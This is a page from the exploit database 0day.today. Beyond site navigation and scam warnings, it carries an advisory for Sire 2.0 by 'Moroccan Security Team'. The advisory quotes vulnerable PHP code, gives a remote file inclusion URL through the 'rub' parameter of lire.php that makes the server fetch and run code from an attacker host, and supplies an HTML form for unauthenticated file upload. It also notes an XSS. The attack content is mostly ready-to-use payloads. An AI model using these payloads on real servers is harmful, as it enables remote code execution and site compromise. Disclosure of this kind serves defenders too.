0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability
============================================================================ Sire 2.0 (lire.php) Remote File Inclusion/Arbitary File Upload Vulnerability ============================================================================ [+]File Inclusion: Input passed to the "rub" parameter in "lire.php" isn't properly verified, before it is used to include remote files Successful exploitation requires that "register_globals" is enabled. [lire.php code] <? 73 if(empty($_GET["rub"])){$rub=rtrim($rubriques[0]);} else {$rub=$_GET["rub"];} 75 include($rub."/compter.php"); ## File Inclusion !! 298 echo $rub; ## XSS ?> [+]Exploit: Exploit http://[trajet]/lire.php?rub=http://[attacker]&cahier=1&art=1 [+]http://[attacker]/compter.php Will be Included And Executed withe the privilege of the webserver File Upload Remote User can Upload jpg,jpeg,gif,bmp files without Identification , [upload.php code:] <? if( isset($_POST['upload']) ) // si formulaire soumis { #Upload code .... } ?> Exploit : <form enctype="multipart/form-data" method="post" action="http://Trajet/upload.php?"> Download File<br> <input name="fichier" type="file" size="48"><br> <input type="submit" name="upload" value="uploader"><form> [Moroccan Security Team] # 0day.today [2024-11-15] #